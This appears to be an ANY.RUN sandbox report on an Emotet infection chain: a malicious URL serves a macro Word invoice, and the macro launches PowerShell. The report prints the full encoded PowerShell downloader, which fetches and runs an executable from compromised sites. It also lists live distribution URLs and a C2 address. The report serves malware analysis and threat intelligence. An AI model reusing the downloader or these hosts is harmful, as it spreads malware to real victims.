analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://fmhss.edu.in/wp-includes/sec.accs.docs.com/

Full analysis: https://app.any.run/tasks/b07f8351-e7b6-4d16-bc7e-2a2392ba35fb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 13:13:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
emotet-doc
Indicators:
MD5:

A727D36CB6906BA10E8815670605862F

SHA1:

A3E9BF2F779CAD1BC64636FFB6AABB41F2A27CDF

SHA256:

47733790F3F65277A3E86685BE8F36F19B268D42B06A58AF5712E38123DE561B

SSDEEP:

3:N1KYjgLMUe2pcRKIK:CYCMUfpcpK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3324)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1472)
    • Application was dropped or rewritten from another process

      • 809.exe (PID: 3964)
      • wabmetagen.exe (PID: 1472)
      • wabmetagen.exe (PID: 4080)
      • 809.exe (PID: 3096)
    • Connects to CnC server

      • wabmetagen.exe (PID: 4080)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 4080)
    • EMOTET was detected

      • wabmetagen.exe (PID: 4080)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3324)
    • Starts Microsoft Office Application

      • firefox.exe (PID: 916)
      • WINWORD.EXE (PID: 3244)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3324)
      • 809.exe (PID: 3964)
      • firefox.exe (PID: 916)
    • Application launched itself

      • WINWORD.EXE (PID: 3244)
      • 809.exe (PID: 3096)
      • wabmetagen.exe (PID: 1472)
    • Starts itself from another location

      • 809.exe (PID: 3964)
    • Connects to server without host name

      • wabmetagen.exe (PID: 4080)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3244)
      • firefox.exe (PID: 916)
    • Application launched itself

      • firefox.exe (PID: 916)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3244)
      • WINWORD.EXE (PID: 4068)
    • Reads CPU info

      • firefox.exe (PID: 916)
    • Dropped object may contain Bitcoin addresses

      • firefox.exe (PID: 916)
    • Reads settings of System Certificates

      • firefox.exe (PID: 916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
13
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start firefox.exe firefox.exe no specs firefox.exe firefox.exe firefox.exe firefox.exe winword.exe no specs winword.exe no specs powershell.exe 809.exe no specs 809.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
916"C:\Program Files\Mozilla Firefox\firefox.exe" http://fmhss.edu.in/wp-includes/sec.accs.docs.com/C:\Program Files\Mozilla Firefox\firefox.exe
explorer.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
65.0.2
2968"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="916.0.1292492323\1803422725" -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - "C:\Users\admin\AppData\LocalLow\Mozilla\Temp-{ce348e4c-7d33-445e-89f9-60108c51bcaf}" 916 "\\.\pipe\gecko-crash-server-pipe.916" 1128 gpuC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
65.0.2
1624"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="916.6.1141797179\1754645412" -childID 1 -isForBrowser -prefsHandle 1652 -prefMapHandle 1632 -prefsLen 1 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 916 "\\.\pipe\gecko-crash-server-pipe.916" 1628 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
3756"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="916.13.847359172\470608579" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2708 -prefsLen 5094 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 916 "\\.\pipe\gecko-crash-server-pipe.916" 2836 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
1544"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="916.20.681497468\2072685380" -childID 3 -isForBrowser -prefsHandle 3496 -prefMapHandle 3488 -prefsLen 5824 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 916 "\\.\pipe\gecko-crash-server-pipe.916" 3456 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
65.0.2
3576"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="916.27.885647950\898792862" -childID 4 -isForBrowser -prefsHandle 3712 -prefMapHandle 3716 -prefsLen 5824 -prefMapSize 180950 -schedulerPrefs 0001,2 -parentBuildID 20190225143501 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 916 "\\.\pipe\gecko-crash-server-pipe.916" 3728 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
65.0.2
3244"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW_INVOICE_V8_4-27_W0269.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEfirefox.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4068"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3324powershell -e JAB6AEQAQQB4AEcAdwBBAD0AKAAnAFMAJwArACcAQQBvAEEARAAnACsAJwBRAEEAQQAnACkAOwAkAHQAQQBvAGMARABCAEQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAUQBCAGMAVQBvAEIAQQA9ACgAJwBoACcAKwAnAHQAdABwACcAKwAnADoAJwArACcALwAnACsAJwAvAHcAdwB3ACcAKwAnAC4AbQBhAGQAbwBuAG4AYQAnACsAJwBiAGEAJwArACcAbABsAC4AJwArACcAYwAnACsAJwBvAG0ALwB3AHAAJwArACcALQBjAG8AbgB0AGUAbgAnACsAJwB0ACcAKwAnAC8AWABiAGMALwBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AdwB3ACcAKwAnAHcALgBkAHIAaQB2AGkAbgBnAHcAaQB0AGgAYQByAHIAbwAnACsAJwB3ACcAKwAnAC4AJwArACcAYwBvACcAKwAnAG0ALwB3AHAALQBjAG8AbgAnACsAJwB0AGUAJwArACcAbgAnACsAJwB0AC8AcABsAHUAZwBpAG4AcwAvAHcAOABLAEYAOAA2AC8AJwArACcAQAAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAnACsAJwAvAHQAJwArACcAbwB0ACcAKwAnAGUAJwArACcAbQByAHUAcwBzAGkAYQAnACsAJwAuAGMAbwBtACcAKwAnAC8ANgB1AHEAOQB1AGQAJwArACcAawAvAHAAJwArACcAdAAnACsAJwA5AEcALwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AawBhAHoAaQByACcAKwAnAGkAYQBkAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAAJwArACcALQBhAGQAbQBpACcAKwAnAG4ALwA4AFkAOQAnACsAJwA4AC8AQABoACcAKwAnAHQAdABwADoALwAvAG0AbwAnACsAJwB2AGUAdAByAGEAYwBrACcAKwAnAGUAcgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnAE0AWQBzAHcALwAnACkALgAoACcAUwAnACsAJwBwAGwAaQB0ACcAKQAuAEkAbgB2AG8AawBlACgAJwBAACcAKQA7ACQAdABRAEIAMQBBAEEAQQBRAD0AKAAnAHcAJwArACcAWABHAEEAQwBVAEEAJwArACcAVQAnACkAOwAkAGkAQgBBAG8AQQBBAEEAIAA9ACAAKAAnADgAMAAnACsAJwA5ACcAKQA7ACQAWQBBAFUAQQBVAEEAdwA9ACgAJwBXACcAKwAnAGMAQQBCAEEAQQAnACsAJwBBAEQAJwApADsAJAByAFgAUQBvAFEAQQBBAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABpAEIAQQBvAEEAQQBBACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAcgBVAFoAWgB4AFEAVQAgAGkAbgAgACQAbABRAEIAYwBVAG8AQgBBACkAewB0AHIAeQB7ACQAdABBAG8AYwBEAEIARAAuACgAJwBEAG8AJwArACcAdwAnACsAJwBuAGwAbwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAcgBVAFoAWgB4AFEAVQAsACAAJAByAFgAUQBvAFEAQQBBACkAOwAkAGoAQQBaAEQAUQBBAHcARAA9ACgAJwBRAFUAQwBYAEEAVQAnACsAJwBBACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJAByAFgAUQBvAFEAQQBBACkALgAiAEwAZQBuAGAARwBgAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQAcgBYAFEAbwBRAEEAQQA7ACQAYgBRAEEAQgBEAFEAPQAoACcAcQBfAEEAQgAnACsAJwBEAEEAJwArACcAQQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBEADQAbwBaAEcAPQAoACcAYwBVAHgAQQBBAEMAJwArACcAXwAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3096"C:\Users\admin\809.exe" C:\Users\admin\809.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
Total events
2 975
Read events
2 470
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
65
Text files
32
Unknown types
47

Dropped files

PID
Process
Filename
Type
916firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm
MD5:
SHA256:
916firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js
MD5:
SHA256:
916firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp
MD5:
SHA256:
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-current.binbinary
MD5:AC883E1540054B6B75B0229FD8CF8BB3
SHA256:1298683E48691721E36AD37EA14504B4EE025A0317B58AD259704FFD088F0625
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\base-track-digest256.sbstorebinary
MD5:23E438FD4AF1829D4469FF8D0BC83854
SHA256:96E0D7644AEA81D26F039AE633EB405583E11B020363090DAC5CAD9B4B188846
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\urlCache-current.binbinary
MD5:C3A9989BA17002377D139ECE64F6989F
SHA256:783A90DE10044CC155212243ED346C2AB51BFF1FF3B50232CABFD9DF8EB0091A
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\block-flashsubdoc-digest256.sbstorebinary
MD5:04824A1F92353F43EBB9E7F74B7476FD
SHA256:B48E58EBAB82E4C376F16150A3FFF850C1111FF1F5985D68819CFD6F0DB159D2
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\startupCache\scriptCache-child-current.binbinary
MD5:C8C881CB2BCDAE33DA6F19BB200BC4BF
SHA256:BF7A738A7F98D25531E0CE0DA229B9031C1040795AC30BC3D341759B6083EFAC
916firefox.exeC:\Users\admin\AppData\Local\Temp\02PrfeN_.doc.partdocument
MD5:77414622B52CBE2F97465E3E9AE9E73F
SHA256:1B59EE07745C0E455343916BCD89C08476538B2711972F95AA78ADD465AD1D4A
916firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\except-flashallow-digest256.pset
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
19
TCP/UDP connections
33
DNS requests
80
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
916
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
916
firefox.exe
POST
200
172.217.22.35:80
http://ocsp.pki.goog/GTSGIAG3
US
der
471 b
whitelisted
916
firefox.exe
GET
200
193.70.14.51:80
http://fmhss.edu.in/wp-includes/sec.accs.docs.com/
FR
document
164 Kb
suspicious
4080
wabmetagen.exe
POST
200.116.26.234:80
http://200.116.26.234/symbols/loadan/
CO
malicious
916
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
916
firefox.exe
GET
200
2.16.186.50:80
http://detectportal.firefox.com/success.txt
unknown
text
8 b
whitelisted
3324
powershell.exe
GET
301
68.183.59.37:80
http://www.drivingwitharrow.com/wp-content/plugins/w8KF86/
US
html
178 b
suspicious
3324
powershell.exe
GET
301
104.198.58.34:80
http://www.madonnaball.com/wp-content/Xbc/
US
html
178 b
whitelisted
916
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
916
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
916
firefox.exe
34.213.175.109:443
search.services.mozilla.com
Amazon.com, Inc.
US
unknown
916
firefox.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
916
firefox.exe
104.16.41.2:443
www.mozilla.org
Cloudflare Inc
US
shared
916
firefox.exe
172.217.23.138:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
916
firefox.exe
13.33.90.232:443
snippets.cdn.mozilla.net
Amazon.com, Inc.
US
unknown
916
firefox.exe
193.70.14.51:80
fmhss.edu.in
OVH SAS
FR
suspicious
916
firefox.exe
52.39.131.77:443
tiles.services.mozilla.com
Amazon.com, Inc.
US
unknown
916
firefox.exe
2.16.186.50:80
detectportal.firefox.com
Akamai International B.V.
whitelisted
916
firefox.exe
172.217.22.35:80
ocsp.pki.goog
Google Inc.
US
whitelisted
3324
powershell.exe
68.183.59.37:80
www.drivingwitharrow.com
DSL Extreme
US
unknown

DNS requests

Domain
IP
Reputation
detectportal.firefox.com
  • 2.16.186.50
  • 2.16.186.112
whitelisted
fmhss.edu.in
  • 193.70.14.51
suspicious
a1089.dscd.akamai.net
  • 2.16.186.112
  • 2.16.186.50
whitelisted
search.services.mozilla.com
  • 34.213.175.109
  • 35.166.112.39
  • 52.88.150.81
whitelisted
search.r53-2.services.mozilla.com
  • 52.88.150.81
  • 35.166.112.39
  • 34.213.175.109
whitelisted
tiles.services.mozilla.com
  • 52.39.131.77
  • 52.35.250.5
  • 52.41.78.152
  • 52.25.148.139
  • 52.26.103.165
  • 35.164.197.9
  • 35.164.130.113
  • 35.165.22.140
whitelisted
snippets.cdn.mozilla.net
  • 13.33.90.232
whitelisted
tiles.r53-2.services.mozilla.com
  • 35.165.22.140
  • 35.164.130.113
  • 35.164.197.9
  • 52.26.103.165
  • 52.25.148.139
  • 52.41.78.152
  • 52.35.250.5
  • 52.39.131.77
whitelisted
drcwo519tnci7.cloudfront.net
  • 13.33.90.232
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
916
firefox.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
916
firefox.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
916
firefox.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3324
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3324
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3324
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1 ETPRO signatures available at the full report
No debug info